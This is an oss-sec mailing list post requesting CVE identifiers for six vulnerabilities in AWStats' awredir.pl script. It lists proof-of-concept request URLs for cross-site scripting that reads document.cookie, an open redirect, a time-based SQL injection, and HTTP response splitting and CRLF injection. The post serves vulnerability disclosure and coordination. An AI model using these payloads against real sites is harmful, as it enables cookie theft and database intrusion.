oss-sec mailing list archives
CVE Request -- Multiple security issues in various versions of AWStats
From: Jan Lieskovsky <jlieskov () redhat com>
Date: Fri, 07 Oct 2011 10:17:15 +0200
Hello Josh, Steve, vendors, these doesn't look like CVE ids have been already assigned for: [1] https://bugzilla.redhat.com/show_bug.cgi?id=740926#c0 [2] http://secunia.com/advisories/46160/ [3] http://seclists.org/fulldisclosure/2011/Sep/234 [4] http://websecurity.com.ua/5380/ If I counted correctly, six CVE ids should be assigned for these (since different versions are listed as vulnerable): 1) XSS (WASC-08) (in versions <=1.1): http://site/awredir.pl?url=javascript:alert(document.cookie) 2) Redirector (URL Redirector Abuse in WASC 2.0) (WASC-38): http://site/awredir.pl?url=http://websecurity.com.ua 3) SQL Injection (WASC-19): (version 1.2) http://site/awredir.pl?url='%20and%20benchmark(10000,md5(now()))/* 4) XSS (WASC-08) (in version 1.2): http://site/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C /script%3E http://site/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C /script%3E 5) HTTP Response Splitting (WASC-25): http://site/awredir.pl?key=04ed5362e853c72ca275818a7c0c5857& url=%0AHeader:1 6) CRLF Injection (Improper Input Handling in WASC 2.0) (WASC-20): http://site/awredir.pl?key=4b9faa91e2529400c4f3c70833b4e4a5& url=%0AText Could you allocate CVE identifiers for these? (let me know if further description of each of the issues is necessary prior assignment). Thank you && Regards, Jan. -- Jan iankko Lieskovsky / Red Hat Security Response Team
Current thread:
- CVE Request -- Multiple security issues in various versions of AWStats Jan Lieskovsky (Oct 07)
- Re: CVE Request -- Multiple security issues in various versions of AWStats Jan Lieskovsky (Oct 07)
- Re: CVE Request -- Multiple security issues in various versions of AWStats MustLive (Oct 07)
- Re: CVE Request -- Multiple security issues in various versions of AWStats Petr Lautrbach (Oct 10)
- Re: CVE Request -- Multiple security issues in various versions of AWStats MustLive (Oct 10)
- Re: CVE Request -- Multiple security issues in various versions of AWStats MustLive (Oct 07)
- Re: CVE Request -- Multiple security issues in various versions of AWStats Jan Lieskovsky (Oct 07)
- Re: CVE Request -- Multiple security issues in various versions of AWStats MustLive (Oct 07)